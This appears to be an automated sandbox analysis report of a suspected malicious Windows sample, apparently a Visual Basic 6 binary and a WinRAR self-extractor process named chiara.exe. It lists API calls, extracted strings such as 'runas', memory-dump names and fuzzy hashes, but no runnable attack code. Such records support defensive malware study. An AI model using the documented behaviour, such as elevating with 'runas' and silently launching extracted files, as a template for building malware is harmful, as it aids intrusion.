__vbaOnError.MSVBVM60(00000001,?,?,?,?,?,?,?,?,004025E6), ref: 0040E6EA
__vbaCastObj.MSVBVM60(00000000,004071DC,?,?,?,?,?,?,?,?,004025E6), ref: 0040E6F8
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,004025E6), ref: 0040E703
__vbaHresultCheckObj.MSVBVM60(00000000,?,00407144,000007C4,?,?,?,?,?,?,?,?,004025E6), ref: 0040E723
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,004025E6), ref: 0040E72C
__vbaRaiseEvent.MSVBVM60(?,00000002,00000000,?,?,?,?,?,?,?,?,004025E6), ref: 0040E736
__vbaExitProc.MSVBVM60(?,?,?,?,?,?,?,?,004025E6), ref: 0040E73F

Memory Dump Source

Source File: 00000000.00000002.2022309950.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2021467340.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2021583300.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022551207.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022684258.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: __vba$CastCheckErrorEventExitFreeHresultProcRaise
String ID:
API String ID: 2392155486-0
Opcode ID: b7ab2b53e9fe8407814622c4ea2936945701b59724f8c03dfa2f10b314959642
Instruction ID: 64c0aa39b9ec461804333c35a90b8c194e87fd5da105c06a014ba34ae980e718
Opcode Fuzzy Hash: b7ab2b53e9fe8407814622c4ea2936945701b59724f8c03dfa2f10b314959642
Instruction Fuzzy Hash: 3211BF71900254ABCB00AFA5CD49E9E7B78FF49B04F10852AF945B62E1C77854418BE9

Function 00417458 Relevance: 10.5, APIs: 7, Instructions: 29COMMON

Download Yara Rule

APIs

__vbaExitProc.MSVBVM60 ref: 00417458
__vbaAryDestruct.MSVBVM60(00000000,?,004174A7), ref: 0041747C
__vbaAryDestruct.MSVBVM60(00000000,?), ref: 00417484
__vbaAryDestruct.MSVBVM60(00000000,?), ref: 0041748C
__vbaAryDestruct.MSVBVM60(00000000,?), ref: 00417494
__vbaAryDestruct.MSVBVM60(00000000,?), ref: 0041749C
__vbaAryDestruct.MSVBVM60(00000000,?), ref: 004174A4

Memory Dump Source

Source File: 00000000.00000002.2022309950.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2021467340.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2021583300.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022551207.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022684258.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: __vba$Destruct$ExitProc
String ID:
API String ID: 1594393734-0
Opcode ID: 65cc65516ad45df1b1f5dcc83af42ead7481cbb47c4d7635c82ff8eb0cff5d94
Instruction ID: 1c4b0c633f18c9e3bddb3555aaad557ebaf8a4bf2d76904fda437b0bccd5ade5
Opcode Fuzzy Hash: 65cc65516ad45df1b1f5dcc83af42ead7481cbb47c4d7635c82ff8eb0cff5d94
Instruction Fuzzy Hash: 00E050B2D58218AAE744D7D0ED45FED7B3CEB84701F004116FA46AA0D89AA02A45CBB5

Function 0041887E Relevance: 10.5, APIs: 7, Instructions: 29COMMON

Download Yara Rule

APIs

__vbaExitProc.MSVBVM60 ref: 0041887E
__vbaAryDestruct.MSVBVM60(00000000,?,004188CD), ref: 004188A2
__vbaAryDestruct.MSVBVM60(00000000,?), ref: 004188AA
__vbaAryDestruct.MSVBVM60(00000000,?), ref: 004188B2
__vbaAryDestruct.MSVBVM60(00000000,?), ref: 004188BA
__vbaAryDestruct.MSVBVM60(00000000,?), ref: 004188C2
__vbaAryDestruct.MSVBVM60(00000000,?), ref: 004188CA

Memory Dump Source

Source File: 00000000.00000002.2022309950.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2021467340.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2021583300.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022551207.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022684258.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: __vba$Destruct$ExitProc
String ID:
API String ID: 1594393734-0
Opcode ID: 6d6b2ce9373d417b402dd24b6c4533e81eb0a1ea67bba482b0d9e88b5f08c903
Instruction ID: 7559dc89658ccc2b58e0618bd5d3b53ed62fe53bb83953d9ec1d7c87f6bb5db1
Opcode Fuzzy Hash: 6d6b2ce9373d417b402dd24b6c4533e81eb0a1ea67bba482b0d9e88b5f08c903
Instruction Fuzzy Hash: 0AE050B2D44118AAEB44D7D0ED45FFD7B3CEB84701F04411AFB46AA0D8DAA42A45CFA5

Function 00410080 Relevance: 9.1, APIs: 6, Instructions: 64COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(00000000,004025E6), ref: 0041009E
__vbaOnError.MSVBVM60(000000FF,00000000,6CF8D8B1,6CF8DF85,00000000,004025E6), ref: 004100CE

Part of subcall function 00410C70: __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,?,?,004100E0), ref: 00410C8E
Part of subcall function 00410C70: __vbaOnError.MSVBVM60(000000FF,00000000,6CF8D8B1,6CF8DF85,00000000,004025E6), ref: 00410CBE
Part of subcall function 00410C70: __vbaSetSystemError.MSVBVM60 ref: 00410CD3
Part of subcall function 00410C70: __vbaSetSystemError.MSVBVM60(?,00000028,?), ref: 00410CEB
Part of subcall function 00410C70: __vbaSetSystemError.MSVBVM60(?,00000000,?,0000001C,?,0000001C), ref: 00410D3B
Part of subcall function 00410C70: __vbaSetSystemError.MSVBVM60(?), ref: 00410E35

__vbaSetSystemError.MSVBVM60(001F0FFF,00000000), ref: 004100FC
__vbaSetSystemError.MSVBVM60(?,?), ref: 0041011C
__vbaSetSystemError.MSVBVM60(?,?), ref: 00410139
__vbaSetSystemError.MSVBVM60(?), ref: 00410155

Memory Dump Source

Source File: 00000000.00000002.2022309950.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2021467340.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2021583300.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022551207.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022684258.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: __vba$Error$System$Chkstk
String ID:
API String ID: 1207130036-0
Opcode ID: 885c88b7c4a7b9d42de6fe011f4235768c88f6b92c19c0712b662b2dd21f9fb8
Instruction ID: 7b377bd5de676e89d855d9e41b3201db1aa312fdf1275dcf7b41b08b02665fd4
Opcode Fuzzy Hash: 885c88b7c4a7b9d42de6fe011f4235768c88f6b92c19c0712b662b2dd21f9fb8
Instruction Fuzzy Hash: 172107B5900348EBDB00DFE5DA49BDEBBB4FF48714F10812AE504B7290D7796A44CBA8

Function 0040E780 Relevance: 9.0, APIs: 6, Instructions: 48COMMON

Download Yara Rule

APIs

__vbaOnError.MSVBVM60(00000001,?,?,?,?,?,?,?,?,004025E6), ref: 0040E7BF
__vbaCastObj.MSVBVM60(00000000,004071DC,?,?,?,?,?,?,?,?,004025E6), ref: 0040E7CD
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,004025E6), ref: 0040E7D8
__vbaHresultCheckObj.MSVBVM60(00000000,?,00407144,000007C4,?,?,?,?,?,?,?,?,004025E6), ref: 0040E7F8
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,004025E6), ref: 0040E801
__vbaExitProc.MSVBVM60(?,?,?,?,?,?,?,?,004025E6), ref: 0040E807

Memory Dump Source

Source File: 00000000.00000002.2022309950.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2021467340.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2021583300.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022551207.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022684258.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: __vba$CastCheckErrorExitFreeHresultProc
String ID:
API String ID: 2075080343-0
Opcode ID: 583a2b12934fe07e965f9a3ec7616fd2eb1ad477de0851f69ba3b3345f60b789
Instruction ID: 3bf4f8c77da95384cc45dd6dff3f381c91b1124e7f22c247587acc69ccce5f1d
Opcode Fuzzy Hash: 583a2b12934fe07e965f9a3ec7616fd2eb1ad477de0851f69ba3b3345f60b789
Instruction Fuzzy Hash: A1015B71940214ABCB00AFA5CE49EAABBB8FF48700F10456AF945B32A1C77854418EA9

Function 00419674 Relevance: 9.0, APIs: 6, Instructions: 19COMMON

Download Yara Rule

APIs

__vbaFileClose.MSVBVM60(00000000), ref: 00419681
__vbaFileClose.MSVBVM60(00000000), ref: 0041968B
__vbaExitProc.MSVBVM60 ref: 00419694
__vbaFreeStr.MSVBVM60(004196D8), ref: 004196CB
__vbaFreeStr.MSVBVM60 ref: 004196D0
__vbaFreeStr.MSVBVM60 ref: 004196D5

Memory Dump Source

Source File: 00000000.00000002.2022309950.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2021467340.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2021583300.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022551207.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022684258.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: __vba$Free$CloseFile$ExitProc
String ID:
API String ID: 2014117853-0
Opcode ID: 2d004a00b349fb87b40256e6660000f0fcf9f27bd89329952208d229b7140539
Instruction ID: dfea4ae46e95b786737fd6ac62915e102b9398e5dcf88c16ee641d2aebd4778e
Opcode Fuzzy Hash: 2d004a00b349fb87b40256e6660000f0fcf9f27bd89329952208d229b7140539
Instruction Fuzzy Hash: 12E01276821128AACB04EBA0FD206DC3BB8FB08310B118026E846B3174DB742D84CFA8

Function 00418980 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 52COMMON

Download Yara Rule

APIs

__vbaOnError.MSVBVM60(00000001,?,x$@,?,?,?,?,?,00000000,004025E6), ref: 004189B6
__vbaExitProc.MSVBVM60(?,?,?,?,00000000,004025E6), ref: 004189E7
__vbaErrorOverflow.MSVBVM60(?,?,?,?,00000000,004025E6), ref: 00418A02

Strings

x$@, xrefs: 0041899D
XuA, xrefs: 004189BC

Memory Dump Source

Source File: 00000000.00000002.2022309950.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2021467340.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2021583300.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022551207.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022684258.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: __vba$Error$ExitOverflowProc
String ID: XuA$x$@
API String ID: 3328922952-1101804690
Opcode ID: c076097e3a78d3169a304b0a4590783ceaa35cecd4cc0d2262e250e498d51d51
Instruction ID: f41aac51504d4341bf14d78ed7085f01873fde132ca3eda0e8d0e8435c4d1104
Opcode Fuzzy Hash: c076097e3a78d3169a304b0a4590783ceaa35cecd4cc0d2262e250e498d51d51
Instruction Fuzzy Hash: 310180B5D00254AFC710DF989A056DDFBB4EB08B50F10426BE805A3350C77458408BEA

Function 0040E250 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

__vbaOnError.MSVBVM60(00000001,?,?,?,?,?,?,?,?,?,?,?,?,004025E6), ref: 0040E295
__vbaHresultCheckObj.MSVBVM60(00000000,?,00407144,000007BC), ref: 0040E2BA
__vbaHresultCheckObj.MSVBVM60(00000000,?,004071CC,00000094), ref: 0040E2E4
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,004025E6), ref: 0040E2F3
__vbaExitProc.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,004025E6), ref: 0040E2F9

Memory Dump Source

Source File: 00000000.00000002.2022309950.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2021467340.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2021583300.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022551207.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022684258.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: __vba$CheckHresult$ErrorExitFreeProc
String ID:
API String ID: 4045702744-0
Opcode ID: ccc439e8694d0f94d9a812796e14e68a8162fab669cebb24eee0f06880352765
Instruction ID: b42082684cfda9da04a5b7e5b2bad02e9e7a05c797a4a6675c2a700778014143
Opcode Fuzzy Hash: ccc439e8694d0f94d9a812796e14e68a8162fab669cebb24eee0f06880352765
Instruction Fuzzy Hash: 87114A74900214ABCB00DFA6CD48EDEBFF8FF98700F24456AF445B72A0C77859418AA9

Analysis Process: chiara.exe PID: 1892, Parent PID: 6292COMMON

Executed Functions

Function 00007FF6CCCAB190 Relevance: 125.7, APIs: 61, Strings: 10, Instructions: 1421windowfilesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6CCC8255C: GetDlgItem.USER32 ref: 00007FF6CCC825AC
Part of subcall function 00007FF6CCC8255C: SetDlgItemTextW.USER32 ref: 00007FF6CCC825C8

EndDialog.USER32 ref: 00007FF6CCCAB2D0
SetDlgItemTextW.USER32 ref: 00007FF6CCCAB320
GetMessageW.USER32 ref: 00007FF6CCCAB350
IsDialogMessageW.USER32 ref: 00007FF6CCCAB369
TranslateMessage.USER32 ref: 00007FF6CCCAB37B
DispatchMessageW.USER32 ref: 00007FF6CCCAB389
EndDialog.USER32 ref: 00007FF6CCCAB3D3
GetDlgItem.USER32 ref: 00007FF6CCCAB410
IsDlgButtonChecked.USER32 ref: 00007FF6CCCAB431
IsDlgButtonChecked.USER32 ref: 00007FF6CCCAB449
SetFocus.USER32 ref: 00007FF6CCCAB452
GetLastError.KERNEL32 ref: 00007FF6CCCAB634
GetLastError.KERNEL32 ref: 00007FF6CCCAB665
GetTickCount.KERNEL32 ref: 00007FF6CCCAB68B
GetLastError.KERNEL32 ref: 00007FF6CCCAB6F5
GetCommandLineW.KERNEL32 ref: 00007FF6CCCAB841
CreateFileMappingW.KERNEL32 ref: 00007FF6CCCAB900
MapViewOfFile.KERNEL32 ref: 00007FF6CCCAB923
ShellExecuteExW.SHELL32 ref: 00007FF6CCCAB95B
Sleep.KERNEL32 ref: 00007FF6CCCAB9B6
UnmapViewOfFile.KERNEL32 ref: 00007FF6CCCAB9DF
CloseHandle.KERNEL32 ref: 00007FF6CCCAB9E8
SetDlgItemTextW.USER32 ref: 00007FF6CCCABCDE
DialogBoxParamW.USER32 ref: 00007FF6CCCAC0D7
EndDialog.USER32 ref: 00007FF6CCCAC0EF
EnableWindow.USER32 ref: 00007FF6CCCAC2A6
IsDlgButtonChecked.USER32 ref: 00007FF6CCCAC2F8
WaitForInputIdle.USER32 ref: 00007FF6CCCAB9A3

Part of subcall function 00007FF6CCC9AAE0: LoadStringW.USER32 ref: 00007FF6CCC9AB67
Part of subcall function 00007FF6CCC9AAE0: LoadStringW.USER32 ref: 00007FF6CCC9AB80

IsDlgButtonChecked.USER32 ref: 00007FF6CCCABEC3
SendDlgItemMessageW.USER32 ref: 00007FF6CCCABEEA
GetDlgItem.USER32 ref: 00007FF6CCCABEF8
IsDlgButtonChecked.USER32 ref: 00007FF6CCCABF12
GetDlgItem.USER32 ref: 00007FF6CCCABF4F
SetDlgItemTextW.USER32 ref: 00007FF6CCCABFEC
SetDlgItemTextW.USER32 ref: 00007FF6CCCAC004
SetDlgItemTextW.USER32 ref: 00007FF6CCCAC321
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCCAC363
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCCAC369
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCCAC36F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCCAC375
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCCAC37B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCCAC381
SendDlgItemMessageW.USER32 ref: 00007FF6CCCAC449
EndDialog.USER32 ref: 00007FF6CCCAC463
GetDlgItem.USER32 ref: 00007FF6CCCAC491
SetFocus.USER32 ref: 00007FF6CCCAC49A
SendDlgItemMessageW.USER32 ref: 00007FF6CCCAC53E
FindFirstFileW.KERNEL32 ref: 00007FF6CCCAC562
FindClose.KERNEL32 ref: 00007FF6CCCAC68A
SendDlgItemMessageW.USER32 ref: 00007FF6CCCAC7AF

Part of subcall function 00007FF6CCC8129C: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6CCC81396

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCCACAA9
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCCACAAF
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCCACAB5
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCCACABB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCCACAC1
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCCACAC7

Strings

REPLACEFILEDLG, xrefs: 00007FF6CCCAC3D3
LICENSEDLG, xrefs: 00007FF6CCCAC0C9
STARTDLG, xrefs: 00007FF6CCCAB1CA
@, xrefs: 00007FF6CCCAB7B6
runas, xrefs: 00007FF6CCCAB7C9
__tmp_rar_sfx_access_check_, xrefs: 00007FF6CCCAB6A9
p, xrefs: 00007FF6CCCAB7AB
winrarsfxmappingfile.tmp, xrefs: 00007FF6CCCAB8E0
%s %s, xrefs: 00007FF6CCCAC6D9, 00007FF6CCCAC946
-el -s2 "-d%s" "-sp%s", xrefs: 00007FF6CCCAB799

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: Item$_invalid_parameter_noinfo_noreturn$Message$DialogText$ButtonChecked$FileSend$ErrorLast$CloseFindFocusLoadStringView$CommandConcurrency::cancel_current_taskCountCreateDispatchEnableExecuteFirstHandleIdleInputLineMappingParamShellSleepTickTranslateUnmapWaitWindow
String ID: %s %s$-el -s2 "-d%s" "-sp%s"$@$LICENSEDLG$REPLACEFILEDLG$STARTDLG$__tmp_rar_sfx_access_check_$p$runas$winrarsfxmappingfile.tmp
API String ID: 2128803032-2702805183
Opcode ID: 2a9968aba244896509ff4c0820bae98a1dce8c335f3b0e663456d7a80bf28c0c
Instruction ID: 27a52adf182ccf18a7989adba56b2e19f76f9d1b8810963fad7255e6f695eda2
Opcode Fuzzy Hash: 2a9968aba244896509ff4c0820bae98a1dce8c335f3b0e663456d7a80bf28c0c
Instruction Fuzzy Hash: 00D2A161E086C281EA209F25E8592FA63B1FFD6786F404136DBCDC66A6DF3DE584C740

Function 00007FF6CCCACE88 Relevance: 66.7, APIs: 27, Strings: 10, Instructions: 1963fileCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32 ref: 00007FF6CCCAD5F3
IsDlgButtonChecked.USER32 ref: 00007FF6CCCAD626
IsDlgButtonChecked.USER32 ref: 00007FF6CCCAD655
SHFileOperationW.SHELL32 ref: 00007FF6CCCAD9BB
MoveFileW.KERNEL32 ref: 00007FF6CCCADB4B
MoveFileExW.KERNEL32 ref: 00007FF6CCCADB69
GetTempPathW.KERNEL32 ref: 00007FF6CCCADC49

Part of subcall function 00007FF6CCC81FA0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCC81FFB

EndDialog.USER32 ref: 00007FF6CCCADFCA
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6CCCAEEE3
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCCAEEEF
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCCAEF07
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCCAEF0D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCCAEF13
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCCAEF19
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCCAEF1F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCCAEF25
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCCAEF2B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCCAEF31
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCCAEF37
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCCAEF3D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCCAEF43
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCCAEF49
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCCAEF4F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCCAEF55
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCCAEF5B
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6CCCAEF67
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6CCCAEF73

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 00007FF6CCCAD501
.tmp, xrefs: 00007FF6CCCADA85
<br>, xrefs: 00007FF6CCCAD6DA, 00007FF6CCCAD6E9
MAX, xrefs: 00007FF6CCCAEA82, 00007FF6CCCAEA91
@set:user, xrefs: 00007FF6CCCADD96, 00007FF6CCCADDA5
ProgramFilesDir, xrefs: 00007FF6CCCAD4F0
MIN, xrefs: 00007FF6CCCAEAE5, 00007FF6CCCAEAF4
HIDE, xrefs: 00007FF6CCCAE9E5, 00007FF6CCCAE9F4
.lnk, xrefs: 00007FF6CCCAE406, 00007FF6CCCAE415
lnk, xrefs: 00007FF6CCCAE3CA, 00007FF6CCCAE3D9

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskFile$ButtonCheckedMove$DialogItemOperationPathTemp
String ID: .lnk$.tmp$<br>$@set:user$HIDE$MAX$MIN$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$lnk
API String ID: 2285161090-3916287355
Opcode ID: 2527aede38996913633e210575eae4a6a9c84d3f5cc7fbbb3fde7264caba9a54
Instruction ID: eb996fbf9000312adb86a2f30ed1f3b5dde5fc52eec1fedc6896edb751542c45
Opcode Fuzzy Hash: 2527aede38996913633e210575eae4a6a9c84d3f5cc7fbbb3fde7264caba9a54
Instruction Fuzzy Hash: 7F13AC32A04BC289EB10DF64D8882ED37B1EB84799F501536DB9D97AE9DF38E594C340

Function 00007FF6CCCB0754 Relevance: 45.9, APIs: 21, Strings: 5, Instructions: 380filetimewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6CCC9DFD0: GetModuleHandleW.KERNEL32(?,?,?,00000000,?), ref: 00007FF6CCC9E018
Part of subcall function 00007FF6CCC9DFD0: GetProcAddress.KERNEL32(?,?,?,00000000,?), ref: 00007FF6CCC9E030
Part of subcall function 00007FF6CCC9DFD0: GetProcAddress.KERNEL32(?,?,?,00000000,?), ref: 00007FF6CCC9E05D

Part of subcall function 00007FF6CCC962DC: GetCurrentDirectoryW.KERNEL32 ref: 00007FF6CCC962F2
Part of subcall function 00007FF6CCC962DC: GetCurrentDirectoryW.KERNEL32 ref: 00007FF6CCC9632C

Part of subcall function 00007FF6CCCA946C: OleInitialize.OLE32 ref: 00007FF6CCCA9486
Part of subcall function 00007FF6CCCA946C: SHGetMalloc.SHELL32 ref: 00007FF6CCCA94D4

GetCommandLineW.KERNEL32 ref: 00007FF6CCCB096E
OpenFileMappingW.KERNEL32 ref: 00007FF6CCCB0A07
MapViewOfFile.KERNEL32 ref: 00007FF6CCCB0A30
UnmapViewOfFile.KERNEL32 ref: 00007FF6CCCB0A46
MapViewOfFile.KERNEL32 ref: 00007FF6CCCB0A63
UnmapViewOfFile.KERNEL32 ref: 00007FF6CCCB0ACA
CloseHandle.KERNEL32 ref: 00007FF6CCCB0AD3
SetEnvironmentVariableW.KERNELBASE ref: 00007FF6CCCB0BAD
GetLocalTime.KERNEL32 ref: 00007FF6CCCB0BB8
swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF6CCCB0C13
SetEnvironmentVariableW.KERNEL32 ref: 00007FF6CCCB0C26
GetModuleHandleW.KERNEL32 ref: 00007FF6CCCB0C2E
LoadIconW.USER32 ref: 00007FF6CCCB0C4D
DialogBoxParamW.USER32 ref: 00007FF6CCCB0CB6
SleepEx.KERNEL32 ref: 00007FF6CCCB0CE6
DeleteObject.GDI32 ref: 00007FF6CCCB0D0D
DeleteObject.GDI32 ref: 00007FF6CCCB0D1F
CloseHandle.KERNEL32 ref: 00007FF6CCCB0D67
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCCB0DD7
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCCB0DDD
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCCB0DE3

Part of subcall function 00007FF6CCCAFD0C: SetEnvironmentVariableW.KERNEL32 ref: 00007FF6CCCAFD43
Part of subcall function 00007FF6CCCAFD0C: SetEnvironmentVariableW.KERNEL32 ref: 00007FF6CCCAFDBC

Strings

%4d-%02d-%02d-%02d-%02d-%02d-%03d, xrefs: 00007FF6CCCB0C02
sfxname, xrefs: 00007FF6CCCB0B9B
STARTDLG, xrefs: 00007FF6CCCB0CA5
winrarsfxmappingfile.tmp, xrefs: 00007FF6CCCB09F9
sfxstime, xrefs: 00007FF6CCCB0C1F

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: File$EnvironmentHandleVariableView$_invalid_parameter_noinfo_noreturn$AddressCloseCurrentDeleteDirectoryModuleObjectProcUnmap$CommandDialogIconInitializeLineLoadLocalMallocMappingOpenParamSleepTimeswprintf
String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
API String ID: 1048086575-3710569615
Opcode ID: e2f07e41a968fcb04ee9550a9d49684c74127b96f7d0acdc7beaa72636b89f1c
